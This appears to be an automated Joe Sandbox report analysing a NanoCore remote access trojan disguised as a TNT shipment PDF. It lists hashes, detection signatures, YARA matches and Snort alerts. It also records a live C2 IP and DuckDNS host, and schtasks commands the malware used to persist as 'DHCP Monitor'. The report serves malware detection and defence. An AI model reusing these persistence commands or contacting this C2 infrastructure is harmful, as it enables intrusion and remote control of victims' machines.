Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE

Overview

General Information

Sample Name:TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE
Analysis ID:343026
MD5:d40d97b41a353bc42b0e7ebe451886d9
SHA1:8e416c76489782a32eade1b03bcd26dce3f19a82
SHA256:23b46a12d6b6a703b8e588d24f3c0018cf749556b021b514b963587e7adaa25b
Tags:EXENanoCore

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE (PID: 5816 cmdline: 'C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE' MD5: D40D97B41A353BC42B0E7EBE451886D9)
    • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MSBuild.exe (PID: 2204 cmdline: 'C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE' MD5: D621FD77BD585874F9686D3A76462EF1)
      • schtasks.exe (PID: 7024 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp731A.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6764 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7609.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • MSBuild.exe (PID: 6908 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 0 MD5: D621FD77BD585874F9686D3A76462EF1)
    • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 6968 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: D621FD77BD585874F9686D3A76462EF1)
    • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 2480 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: D621FD77BD585874F9686D3A76462EF1)
    • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"C2: ": ["91.193.75.155"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfef5:$a: NanoCore
    • 0xff05:$a: NanoCore
    • 0x10139:$a: NanoCore
    • 0x1014d:$a: NanoCore
    • 0x1018d:$a: NanoCore
    • 0xff54:$b: ClientPlugin
    • 0x10156:$b: ClientPlugin
    • 0x10196:$b: ClientPlugin
    • 0x1007b:$c: ProjectData
    • 0x10a82:$d: DESCrypto
    • 0x1844e:$e: KeepAlive
    • 0x1643c:$g: LogClientMessage
    • 0x12637:$i: get_Connected
    • 0x10db8:$j: #=q
    • 0x10de8:$j: #=q
    • 0x10e04:$j: #=q
    • 0x10e34:$j: #=q
    • 0x10e50:$j: #=q
    • 0x10e6c:$j: #=q
    • 0x10e9c:$j: #=q
    • 0x10eb8:$j: #=q
    00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xf7ad:$x1: NanoCore.ClientPluginHost
    • 0xf7da:$x2: IClientNetworkHost
    Click to see the 12 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xe38d:$x1: NanoCore.ClientPluginHost
    • 0xe3ca:$x2: IClientNetworkHost
    • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xe105:$x1: NanoCore Client.exe
    • 0xe38d:$x2: NanoCore.ClientPluginHost
    • 0xf9c6:$s1: PluginCommand
    • 0xf9ba:$s2: FileCommand
    • 0x1086b:$s3: PipeExists
    • 0x16622:$s4: PipeCreated
    • 0xe3b7:$s5: IClientLoggingHost
    1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xe0f5:$a: NanoCore
      • 0xe105:$a: NanoCore
      • 0xe339:$a: NanoCore
      • 0xe34d:$a: NanoCore
      • 0xe38d:$a: NanoCore
      • 0xe154:$b: ClientPlugin
      • 0xe356:$b: ClientPlugin
      • 0xe396:$b: ClientPlugin
      • 0xe27b:$c: ProjectData
      • 0xec82:$d: DESCrypto
      • 0x1664e:$e: KeepAlive
      • 0x1463c:$g: LogClientMessage
      • 0x10837:$i: get_Connected
      • 0xefb8:$j: #=q
      • 0xefe8:$j: #=q
      • 0xf004:$j: #=q
      • 0xf034:$j: #=q
      • 0xf050:$j: #=q
      • 0xf06c:$j: #=q
      • 0xf09c:$j: #=q
      • 0xf0b8:$j: #=q
      3.2.MSBuild.exe.6580000.4.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xf7ad:$x1: NanoCore.ClientPluginHost
      • 0xf7da:$x2: IClientNetworkHost
      Click to see the 15 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 2204, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
      Sigma detected: Scheduled temp file as task from temp locationShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp731A.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp731A.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE' , ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 2204, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp731A.tmp', ProcessId: 7024

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: MSBuild.exe.2204.3.memstrMalware Configuration Extractor: NanoCore {"C2: ": ["91.193.75.155"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEMetadefender: Detection: 18%Perma Link
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEReversingLabs: Detection: 59%
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1044661467.00000000040D9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1041355870.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2204, type: MEMORY
      Source: Yara matchFile source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.MSBuild.exe.6580000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.MSBuild.exe.6580000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
      Machine Learning detection for sampleShow sources
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEJoe Sandbox ML: detected
      Source: 3.2.MSBuild.exe.6580000.4.unpackAvira: Label: TR/NanoCore.fadte
      Source: 3.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7

      Compliance:

      barindex
      Uses 32bit PE filesShow sources
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
      Source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb%0 source: MSBuild.exe, 00000003.00000003.941644723.0000000001268000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.pdb source: MSBuild.exe, 00000003.00000003.950346541.000000000126D000.00000004.00000001.sdmp
      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: dhcpmon.exe, dhcpmon.exe.3.dr
      Source: Binary string: wntdll.pdbUGP source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE, 00000001.00000003.652861148.000000001BC10000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE, 00000001.00000003.652861148.000000001BC10000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: MSBuild.exe, 00000003.00000003.941644723.0000000001268000.00000004.00000001.sdmp
      Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 00000003.00000003.657703157.0000000001222000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000000.664261186.0000000000C72000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.683748941.0000000000012000.00000002.00020000.sdmp, dhcpmon.exe.3.dr
      Source: Binary string: \??\C:\Windows\System.pdb source: MSBuild.exe, 00000003.00000003.950311338.000000000125D000.00000004.00000001.sdmp
      Source: Binary string: System.pdbU! source: MSBuild.exe, 00000003.00000003.941616893.000000000125D000.00000004.00000001.sdmp
      Source: Binary string: System.pdb source: MSBuild.exe, 00000003.00000003.996753411.0000000006976000.00000004.00000001.sdmp

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49737 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49738 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49741 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49743 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49744 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49752 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49758 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49762 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49768 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49769 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49770 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49771 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49772 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49775 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49776 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49777 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49778 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49779 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49780 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49781 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49782 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49783 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49784 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49785 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49786 -> 91.193.75.155:5090
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49787 -> 91.193.75.155:5090
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorIPs: 91.193.75.155
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: mimi121.duckdns.org
      Source: global trafficTCP traffic: 192.168.2.4:49737 -> 91.193.75.155:5090
      Source: Joe Sandbox ViewASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
      Source: unknownDNS traffic detected: queries for: mimi121.duckdns.org
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: MSBuild.exe, 00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1044661467.00000000040D9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1041355870.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2204, type: MEMORY
      Source: Yara matchFile source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.MSBuild.exe.6580000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.MSBuild.exe.6580000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000003.00000002.1044661467.00000000040D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.1047272619.00000000064F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000003.00000002.1041355870.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000003.00000002.1041355870.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: MSBuild.exe PID: 2204, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: MSBuild.exe PID: 2204, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.MSBuild.exe.6580000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.MSBuild.exe.64f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.MSBuild.exe.6580000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A558CB1_2_00A558CB
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A658101_2_00A65810
